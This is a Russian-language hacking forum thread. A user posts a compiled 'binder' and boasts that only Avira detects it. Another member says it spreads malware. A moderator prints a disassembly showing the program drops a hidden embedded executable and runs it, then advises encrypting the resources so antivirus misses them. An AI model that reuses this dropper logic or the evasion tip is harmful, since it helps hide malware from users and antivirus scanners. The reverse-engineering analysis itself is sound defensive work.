WgBinder 1.5 by Decide

[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]

Страница 1 из 1 1
Модератор форума: Anton93, Волк-1024, xXxSh@dowxXx

decide

Дата: Четверг, 19.06.2014, 09:02 | Сообщение # 1

Был не раз

Зарегистрирован: 29.05.2014

Группа: Пользователи

Сообщений: 17

Статус: Offline

http://wg.do.am/wg.png
Выкладываю свой биндер!На данный момент палится только авирой

Прикрепления: WgBinder.rar (920.6 Kb)

dolphin

Дата: Четверг, 19.06.2014, 13:22 | Сообщение # 2

Администратор

Сообщений: 906

Статус: Offline

Не помешало хотя бы минимальное описание приложить

Система: Windows 10 x64, Kali Linux
Среды программирования: Delphi 7, Delphi 10.x

Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик

JohnnyDepp

Дата: Вторник, 01.07.2014, 19:51 | Сообщение # 3

Новичок

Зарегистрирован: 01.07.2014

Группа: Пользователи

Сообщений: 2

Статус: Offline

decide, ты и тут свою заразу распространяешь!?Админы проверьте файл (смотрите процесс lasse.exe),этого козла уже на всех ресурсах забанили.

Прикрепления: 7552290.jpg (28.0 Kb)

Сообщение отредактировал JohnnyDepp - Вторник, 01.07.2014, 19:52

xXxSh@dowxXx

Дата: Вторник, 01.07.2014, 22:24 | Сообщение # 4

Авторитетный

Зарегистрирован: 22.01.2012

Группа: Модераторы

Сообщений: 702

Статус: Offline

Цитата decide (

)

Выкладываю свой биндер!На данный момент палится только авирой

по мимо того что нет описания, так еще и не исходниками выложил, а готовым бинарником, логично что ни кто даже смотреть не станет! dry

Anton93

Дата: Вторник, 01.07.2014, 23:02 | Сообщение # 5

Продвинутый

Зарегистрирован: 06.01.2010

Группа: Модераторы

Сообщений: 320

Статус: Offline

не дезассмблировал пока, но судя по скану который сделал, там что-то есь
Scan result

ICQ: 41896

Neo

Дата: Пятница, 04.07.2014, 17:17 | Сообщение # 6

Модератор

Зарегистрирован: 04.05.2010

Группа: Модераторы

Сообщений: 317

Статус: Offline

decide, Продизассемблировал я твой бинарник, ничего интересного....Что за вообще биндер???Может билдер??? Если билдер,что он ничего сам не должен запускать....А вот взглянем на это:

Код

call    CreateFileW
.text:004195A4                 mov     esi, eax
.text:004195A6                 push    0               ; lpOverlapped
.text:004195A8                 lea     eax, [ebp+NumberOfBytesWritten]
.text:004195AB                 push    eax             ; lpNumberOfBytesWritten
.text:004195AC                 push    ebx             ; hResInfo
.text:004195AD                 push    0               ; hModule
.text:004195AF                 call    SizeofResource
.text:004195B4                 push    eax             ; nNumberOfBytesToWrite
.text:004195B5                 push    ebx             ; hResInfo
.text:004195B6                 push    0               ; hModule
.text:004195B8                 call    LoadResource
.text:004195BD                 push    eax             ; hResData
.text:004195BE                 call    LockResource
.text:004195C3                 push    eax             ; lpBuffer
.text:004195C4                 push    esi             ; hFile
.text:004195C5                [b] call    WriteFile[/b]_0
.text:004195CA                 push    esi             ; hObject
.text:004195CB                 call    CloseHandle_0
.text:004195D0                 mov     eax, [ebp+var_14]
.text:004195D3                 mov     edx, offset dword_419728
.text:004195D8                 call    sub_405D80
.text:004195DD                 jnz     short loc_4195E7
.text:004195DF                 push    2               ; dwFileAttributes
.text:004195E1                 push    edi             ; lpFileName
.text:004195E2                [b] call    SetFileAttributesW[/b]
.text:004195E7
.text:004195E7 loc_4195E7:                             ; CODE XREF: sub_41946C+171j
.text:004195E7                 mov     eax, [ebp+var_C]
.text:004195EA                 mov     edx, offset aNormal ; "normal"
.text:004195EF                 call    sub_405D80
.text:004195F4                 jnz     short loc_41960B
.text:004195F6                 push    1               ; nShowCmd
.text:004195F8                 push    0               ; lpDirectory
.text:004195FA                 push    0               ; lpParameters
.text:004195FC                 push    edi             ; lpFile
.text:004195FD                [b] push    offset Operation ; "open"[/b]
.text:00419602                 push    0               ; hwnd
.text:00419604                 [b]call    ShellExecuteW[/b]
.text:00419609                 jmp     short loc_41961E

По этому куску можно определить следующее:
1) твоя прога извлекает из ресурса exeшник
2) записывает его и выставляет атрибут для файла
3) запускает его.
Твои ошибки:
я сразу понял,что в ресурсе спрятан exe по синтатуре MZ....PE.\

Нужно криптовать ресурсы! А после записи расшифровывать их.

Прикрепления: 2794044.jpg (90.6 Kb)

xXxSh@dowxXx

Дата: Пятница, 04.07.2014, 17:48 | Сообщение # 7

Авторитетный

Зарегистрирован: 22.01.2012

Группа: Модераторы

Сообщений: 702

Статус: Offline

Neo красавец, хорошая работа smile

WgBinder 1.5 by Decide

Страница 1 из 1
1